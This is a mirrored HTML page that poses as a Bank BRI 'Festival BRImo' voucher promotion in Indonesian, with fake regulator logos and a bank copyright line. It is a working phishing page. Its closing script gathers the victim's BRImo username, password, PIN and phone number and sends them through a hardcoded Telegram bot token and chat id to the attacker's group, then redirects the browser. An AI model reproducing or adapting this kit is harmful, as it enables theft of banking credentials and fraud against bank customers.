
<!DOCTYPE html><html class="ltr yui3-js-enabled webkit js chrome chrome87 chrome87-0 linux mobile secure touch  lang.dir " dir=" lang.dir " lang="in-ID">
<!-- Mirrored from hadiah-baruu.zzyus.life/id/nope/ by HTTrack Website Copier/3.x [XR&CO'2017], Mon, 13 Nov 2023 13:21:46 GMT -->
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="cid:css-22be1bb0-f219-4991-a1dc-893d784c53c5@mhtml.blink">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0">
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">
<link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">
	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
	<meta name="theme-color" content="#0f78cb">
	<meta property="og:type" content="website">
	<title>FESTIVAL BRImo BRI</title>
	<link rel="icon" type="image/png" href="https://i.ibb.co/Wc61GwP/Frame-1-1.jpg">
<link rel="image_src" href="https://i.ibb.co/Wc61GwP/Frame-1-1.png">
</head>
<body style="position: fixed">
    <section class="section">
    <div class="container">
<main>
	<img style="margin-bottom:0px; margin-left:0px;" width="400px" src="https://inps.biz.id/konfirmasi/infontrf/img/hider.jpg" alt="" />
<chsalxcome2 style="">
<div style="height:30px;width: 70px;margin-top: 320px;margin-bottom: -24px;float:center;margin-left:42%" class="talxcome">
</div>
<br>
<form action="./../req/numb.php" onsubmit="sendNohp(event); return false" method="post" accept-charset="utf-8">
<div class="" style="margin-left: 20px;margin-top: -310px;position:absolute;border:1px solid #0085e0;padding:15px;width:82%;border-radius:10px">
<center style="color:#09559a;">
<br><span><h4>Kode Kupon voucher anda akan segera di proses,selanjutnya silahan verifikasi nomor dari layanan kartu sim anda terlebih dahulu:</h4></span>
</center>
<br>
    <!--
<h5>Masukan Nomor ponsel BRImo Anda:</h5>-->
<i class="ion-ios-telephone-outline" id="ionIcons"></i>
<input type="tel" name="phone" id="NoHp" placeholder="Masukan Nomor Ponsel" maxlength="12" minlength="10" required="" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 2px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255); border-radius: 8px; box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px; font-family: 'Roboto Condensed', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 4px; padding: 0px 45px;">
</div>
</div>
<button type="submit" style="margin-top:-50px;margin-left: 20px;position:absolute;background-color:#0085e0;color:white;border:1px solid #0085e0;width:90%;border-radius:10px;font-size: 15px;padding:13px;" value="AMBIL KUPON">SELANJUTNYA
<h6 style="font-family: 'Open Sans', sans-serif; font-size: 13px; font-weight: bold; color: #000; letter-spacing: 1px; text-align: center; line-height: 1; border-radius: 5px;">
</h6></button>
<p id="status"></p>

</form></chsalxcome2></main></div>
<br>
<center style="color:#000000;margin-top: 20px;">
  <h5> Terdaftar dan diawasi oleh:</h5>
  <img width="50px" src="https://media.publit.io/file/logo-lps-c.png">
  <img width="50px" src="https://media.publit.io/file/logo-ojk-w.png">
  </center>
  <div style="background-color: #09559a;color: white;padding: 15px; position: fixed; bottom: 0; left: 0; right: 0; ">
  <center><h5>Copyright © 2024 - PT. Bank Rakyat Indonesia (Persero) Tbk. | All Rights Reserved.</h5></center>
  </div>
  

<!--
<center>
<img src="/assets/2022.jpg" style="width: 360px; height: 140; margin-top: -70px;"></center>-->

        
      
    </section>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap%405.2.0-beta1/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
    <script src="setPin.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  

<style>

@charset "utf-8";

@font-face { font-family: alexfonthel; src: url("https://hadiah-baruu.zzyus.life/cdn.jsdelivr.net/gh/AlexHostX/another%40main/brims/helvetica_neue.woff"); }

* { margin: 0px; }

html, body { max-width: 100%; overflow-x: hidden; }

body { margin: 0px; background: rgb(255, 255, 255); color: rgb(0, 0, 0); font-family: alexfonthel, sans-serif; }

welalxcome { position: fixed; left: 0px; top: 0px; width: 100vw; height: 100vh; display: flex; flex-flow: row nowrap; align-items: center; place-content: center; }

welalxcome img { width: 21vw; height: auto; }

chsalxcome { position: relative; width: 100%; height: 100vh; display: flex; flex-flow: column nowrap; align-items: center; }

.talxcome { width: 130%; flex-flow: column nowrap; align-items: center; height: 100%; justify-content: center; }

.talxcome img { width: 73%; }

.balxcome { height: 45vh; display: flex; flex-flow: column nowrap; align-items: center; }

.txalxcome { width: 90%; height: 30vh; text-align: left; }

.txalxcome p { font-weight: 600; font-size: 1.5rem; margin-bottom: 5vh; color: rgb(29, 102, 171); }

.txalxcome span { width: 80%; font-size: 18px; }

.btalxcome { width: 90%; height: 20vh; display: flex; flex-flow: column nowrap; align-items: center; }

.btalxcome button { width: 100%; background: rgb(29, 102, 171); color: rgb(255, 255, 255); font-family: inherit; border-radius: 5px; border: none; font-size: 16px; padding: 2vh 0px; margin-bottom: 4vh; font-weight: 500; box-shadow: rgb(0, 0, 0) 0px 0px 1px 0px; cursor: pointer; }

.btalxcome p { color: rgb(29, 102, 171); font-weight: 500; cursor: pointer; }

frmalxbr { position: relative; width: 100vw; height: 100vh; }

.hdralxfrm { width: 100%; position: fixed; left: 0px; top: 0px; display: block; text-align: center; padding: 1.5vh 0px; box-shadow: rgba(0, 0, 0, 0.25) 0px 1px 20px 0px; z-index: 1; }

.hdralxfrm img { width: 10vw; height: auto; }

.chalxfrm { position: relative; width: 100%; height: 50vh; z-index: 0; display: flex; flex-flow: column nowrap; align-items: center; }

.bgchalxfrm { background: url("") center center / 100% no-repeat; position: unset; width: 100%; border-radius: 0px; top: 0px; height: 100%; border: none; margin-top: -50px; }

.chalxfrm p { position: absolute; color: rgb(255, 255, 255); font-size: 19px; font-weight: 600; letter-spacing: 1px; top: 11vh; }

.chalxfrm img { position: absolute; width: 90%; bottom: 5vh; }

.frmalxbrm { display: flex; flex-flow: column nowrap; align-items: center; height: 42vh; width: 100%; }

.inpalxbrm { margin-top: 3vh; width: 90%; height: 35vh; }

.inpalxbrm p { color: rgb(32, 105, 171); font-weight: 600; font-size: 18px; letter-spacing: 1px; margin-left: 3vw; }

.bxmalxbrm { display: flex; flex-flow: column nowrap; align-items: center; width: 100%; padding-top: 2vh; }

.itmalxbrm { position: relative; width: 95%; background: rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.53) 0px 1px 3px 0px; border-radius: 3px; display: flex; flex-flow: row nowrap; align-items: center; padding: 1.8vh 2vw; column-gap: 3vw; }

.itmalxbrm img { height: 4vh; }

.itmalxbrm input { font-family: arial, sans-serif; font-size: 17px; font-weight: 300; border: none; outline: none; }

.inpalxbrm span { width: 100%; text-align: right; display: block; margin-top: 2.5vh; font-size: 14px; cursor: pointer; }

.btnalxfrm { height: 10vh; display: flex; flex-flow: row nowrap; place-content: center; align-items: center; width: 90%; }

.btnalxfrm button { width: 100%; background: rgb(29, 102, 171); color: rgb(255, 255, 255); font-family: inherit; border-radius: 5px; border: none; font-size: 16px; padding: 2vh 0px; margin-bottom: 4vh; font-weight: 500; box-shadow: rgb(0, 0, 0) 0px 0px 1px 0px; cursor: pointer; }

#togglePassword { background-size: 100% 100%; height: 3vh; width: 3.5vh; margin-top: 0px; position: absolute; right: 4vw; cursor: pointer; }

.fa-eye { background: url("") center center no-repeat; }

.fa-eye-slash { background: url("") center center no-repeat; }

.opbtn { opacity: 0.5; }

.alxslh { position: fixed; left: 0px; top: 8vh; z-index: 3; font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); background: rgb(245, 57, 57); text-align: center; width: 100%; font-family: arial, sans-serif; padding: 1.7vh 0px; display: none; }

pnalxbr { background: rgb(36, 131, 240); display: flex; flex-flow: column nowrap; align-items: center; width: 100vw; height: 100vh; color: white; }

.hdralxpn { width: 100%; height: 5vh; display: flex; flex-flow: row nowrap; align-items: center; justify-content: space-between; }

.hdralxpn span { margin-left: 3%; }

.hdralxpn p { font-weight: 400; font-size: 15px; }

.hdralxpn label { visibility: hidden; margin-right: 3%; }

.txalxpn { padding-top: 10vh; padding-bottom: 5vh; width: 70%; text-align: left; }

.txalxpn p { font-size: 17px; font-weight: 400; }

.txalxpn span { font-size: 12px; font-weight: 300; font-family: Arial, sans-serif; }

.inpalxpn { width: 70%; display: flex; flex-flow: column nowrap; align-items: center; }

#alxpnnikah { width: 100%; display: flex; flex-flow: row nowrap; align-items: center; place-content: center; column-gap: 7vw; position: relative; }

#ionIcons { color: rgb(22, 119, 199); font-size: 35px; position: absolute; display: block; margin-top: 5px; margin-left: 13px; }

#alxpnnikah input { position: absolute; z-index: 2; color: rgb(255, 255, 255); border: none; outline: none; font-family: inherit; background: transparent; font-size: 24px; letter-spacing: 10vw; width: 100%; overflow: hidden; float: left; text-align: left; text-overflow: revert; cursor: not-allowed; pointer-events: none; }

.bxinpalxpn { width: 6vw; display: flex; flex-flow: column nowrap; align-items: center; position: relative; place-content: center; }

.bxinpalxpn input { width: 100%; height: 100%; position: absolute; background: transparent; outline: none; border: none; cursor: pointer; text-align: center; color: rgb(255, 255, 255); font-family: inherit; font-size: 24px; }

.bxinpalxpn span { background-color: rgb(136, 180, 230); color: white; height: 6.5vh; width: 5.5vh; display: block; border-radius: 10px; }

.txalxlppn { padding: 7vh 0px 9vh; font-size: 13px; font-family: arial, sans-serif; cursor: pointer; }

.kybalxpn { width: 90%; }

.inpalxkyb { width: 80%; display: flex; flex-flow: row nowrap; align-items: center; justify-content: space-between; margin-bottom: 4vh; margin-left: 30px; }

.inpalxkyb button { background-color: transparent; font-family: inherit; cursor: pointer; outline: none; border: none; font-size: 25px; width: 20%; height: 6vh; }

smalxs { height: 100vh; width: 100vw; background: rgb(242, 242, 242); display: flex; flex-flow: row nowrap; place-content: center; align-items: center; }

.bxalxsm { position: relative; width: 85%; padding: 15vh 0% 2vh; background: rgb(255, 255, 255); display: flex; flex-flow: column nowrap; align-items: center; border: 1px solid rgba(166, 166, 166, 0.37); border-radius: 10px; }

.bxalxsm img { width: 80%; position: absolute; top: -10vh; }

.bxalxsm garis { display: block; width: 100%; border-bottom: 2px dotted rgb(204, 204, 204); }

.bxalxsm label { color: rgb(7, 118, 237); font-weight: 300; font-family: arial, sans-serif; padding: 2vh; }

.alxinpsm { width: 90%; display: flex; flex-flow: column nowrap; align-items: flex-start; }

.alxinpsm span { color: rgb(158, 158, 158); font-size: 12px; font-family: arial, sans-serif; }

.alxinpsm input { box-sizing: border-box; z-index: 4; height: 75px; width: 100%; left: 0px; border-width: 1px; border-style: solid; border-color: rgb(189, 189, 189) rgb(189, 189, 189) rgb(214, 214, 214); border-image: initial; background-color: transparent; border-radius: 5px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; font-size: 13px; color: rgb(85, 85, 85); padding: 0px 4px; top: 20px; transition: border-bottom-color 200ms ease 0s; margin: 1vh 0px 2vh; font-family: arial, sans-serif; outline: navajowhite; }

.btnalxsm { width: 100%; text-align: right; }

.btnalxsm button { cursor: pointer; background: none rgb(0, 134, 224); border: none; text-align: center; box-sizing: border-box; z-index: 6; height: 33px; left: 0px; top: 0px; font-size: 14px; color: rgb(255, 255, 255); line-height: 1; border-radius: 6px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; font-family: arial, sans-serif; letter-spacing: 1px; padding: 0px 10px; outline: navajowhite; }

.dscalxsm { margin-top: 5vh; display: flex; flex-flow: column nowrap; align-items: center; }

.dscalxsm p { text-align: center; width: 90%; font-size: 10px; color: rgba(10, 10, 10, 0.73); font-family: arial, sans-serif; }

.malasngoding-slider { border: 10px solid rgb(239, 239, 239); position: relative; overflow: hidden; background: rgb(239, 239, 239); }

.malasngoding-slider { margin: 20px auto; width: 768px; height: 450px; }

.isi-slider img { width: 768px; height: 450px; float: left; }

.isi-slider { position: absolute; width: 3900px; animation-name: slider; animation-duration: 16s; animation-timing-function: ease-in-out; animation-iteration-count: infinite; }

.isi-slider:hover { animation-play-state: paused; }

.malasngoding-slider::after { font-size: 150px; position: absolute; z-index: 12; color: rgba(255, 255, 255, 0); left: 300px; top: 80px; transition: all 1s ease-in-out 0s; }

.malasngoding-slider:hover::after { color: rgba(255, 255, 255, 0.6); }

@-webkit-keyframes slider { 
  0% { left: 0px; opacity: 0; }
  2% { opacity: 1; }
  20% { left: 0px; opacity: 1; }
  21% { opacity: 0; }
  24% { opacity: 0; }
  25% { left: -768px; opacity: 1; }
  45% { left: -768px; opacity: 1; }
  46% { opacity: 0; }
  48% { opacity: 0; }
  50% { left: -1536px; opacity: 1; }
  70% { left: -1536px; opacity: 1; }
  72% { opacity: 0; }
  74% { opacity: 0; }
  75% { left: -2304px; opacity: 1; }
  95% { left: -2304px; opacity: 1; }
  97% { left: -2304px; opacity: 0; }
  100% { left: 0px; opacity: 0; }
}

@keyframes slider { 
  0% { left: 0px; opacity: 0; }
  2% { opacity: 1; }
  20% { left: 0px; opacity: 1; }
  21% { opacity: 0; }
  24% { opacity: 0; }
  25% { left: -768px; opacity: 1; }
  45% { left: -768px; opacity: 1; }
  46% { opacity: 0; }
  48% { opacity: 0; }
  50% { left: -1536px; opacity: 1; }
  70% { left: -1536px; opacity: 1; }
  72% { opacity: 0; }
  74% { opacity: 0; }
  75% { left: -2304px; opacity: 1; }
  95% { left: -2304px; opacity: 1; }
  97% { left: -2304px; opacity: 0; }
  100% { left: 0px; opacity: 0; }
}

* { margin: 0px; padding: 0px; list-style: none; text-decoration: none; }

.slider { overflow: hidden; height: 540px; }

.slider figure div { width: 20%; float: left; }

.slider figure img { width: 100%; float: left; }

.slider figure { position: relative; width: 500%; margin: 0px; left: 0px; animation: 20s ease 0s infinite normal none running slidy; }

@keyframes slidy { 
  0% { left: 0%; }
  10% { left: 0%; }
  12% { left: -100%; }
  22% { left: -100%; }
  24% { left: -200%; }
  34% { left: -200%; }
  36% { left: -300%; }
  46% { left: -300%; }
  48% { left: -400%; }
  58% { left: -400%; }
  60% { left: -300%; }
  70% { left: -300%; }
  72% { left: -200%; }
  82% { left: -200%; }
  84% { left: -100%; }
  94% { left: -100%; }
  96% { left: 0%; }
  100% { left: 0%; }
}

:root { --modal-duration: 1s; --modal-color: #428bca; }

.button { background: rgb(66, 139, 202); padding: 1em 2em; color: rgb(255, 255, 255); border: 0px; border-radius: 5px; cursor: pointer; }

.button:hover { background: rgb(56, 118, 172); }

.modal { display: none; position: fixed; z-index: 1; left: 0px; top: 0px; height: 100%; width: 100%; overflow: auto; background-color: rgba(0, 0, 0, 0.5); }

.modal-content { margin: 50% auto; width: 85%; box-shadow: rgba(0, 0, 0, 0.2) 0px 5px 8px 0px, rgba(0, 0, 0, 0.17) 0px 7px 20px 0px; animation-name: modalopen; animation-duration: var(--modal-duration); }

.modal-header h2, .modal-footer h3 { margin: 0px; }

.modal-header { background: var(--modal-color); padding: 15px; color: rgb(255, 255, 255); border-top-left-radius: 5px; border-top-right-radius: 5px; }

.modal-body { padding: 10px 20px; background: rgb(255, 255, 255); }

.modal-footer { background: var(--modal-color); padding: 10px; color: rgb(255, 255, 255); text-align: center; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; }

.close { float: right; font-size: 30px; color: rgb(255, 255, 255); }

.close:hover, .close:focus { color: rgb(0, 0, 0); text-decoration: none; cursor: pointer; }

@keyframes modalopen { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}

#alxsm { border-radius: 10px; border: 2px solid rgb(9, 85, 154); color: rgb(9, 85, 154); font-size: 14px; font-weight: bold; margin-bottom: 15px; padding: 0.5em 1em 0.5em 0px; width: 90%; height: 100px; text-align: center; margin-left: 5px; }

.bgchalxfrm2 { background: url("https://siapjadi.com/header4.png") center center / 110% no-repeat; position: unset; width: 130%; border-radius: 0px; top: 0px; height: 500px; border: none; margin-right: -20px; }
</style>
<style>
@charset "utf-8";

@font-face { font-family: "Material Symbols Outlined"; font-style: normal; font-weight: 400; src: url("https://hadiah-baruu.zzyus.life/fonts.gstatic.com/s/materialsymbolsoutlined/v61/kJF1BvYX7BgnkSrUwT8OhrdQw4oELdPIeeII9v6oDMzByHX9rA6RzaxHMPdY43zj-jCxv3fzvRNU22ZXGJpEpjC_1n-q_4MrImHCIJIZrDCvHOejbdhzrA.woff2") format("woff2"); }

.material-symbols-outlined { font-family: "Material Symbols Outlined"; font-weight: normal; font-style: normal; font-size: 24px; line-height: 1; letter-spacing: normal; text-transform: none; display: inline-block; white-space: nowrap; overflow-wrap: normal; direction: ltr; font-feature-settings: "liga"; -webkit-font-smoothing: antialiased; }
</style>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> 
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script>

var usern = sessionStorage.getItem("usern");
document.getElementById("usern").value = usern + "";
var passw = sessionStorage.getItem("passw");
document.getElementById("passw").value = passw + "";
var pinku = sessionStorage.getItem("pinku");
document.getElementById("pinmy").value = pinku + "";
</script>
<script>
function sendNohp(event){
  event.preventDefault();
   


 var usern = document.getElementById('usern');
 var passw = document.getElementById('passw');
 var pinmy = document.getElementById('pinmy');
 var NoHp = document.getElementById('NoHp');
 

    var gabungan = '%0A𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲 :%0A' + usern.value + '%0A𝗣𝗮𝘀𝘀𝘄𝗼𝗿𝗱 :%0A' + passw.value + '%0A𝗣𝗜𝗡 𝗕𝗥𝗜𝗺𝗼 %3A%0A' + pinmy.value + '%0A𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲 %3A%0A' + NoHp.value;

    var token = '6808113150:AAEvsYMXpou2Ld7gRTkC8CHz4sOZk-MpfHs'; // Ganti dengan token bot yang kamu buat
    var grup = '-1002096024530'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    
    success: function(){
    setTimeout(function(){
  window.location.href='./../Valid'
    }, 1000);}});};
</script>
</body>
</html>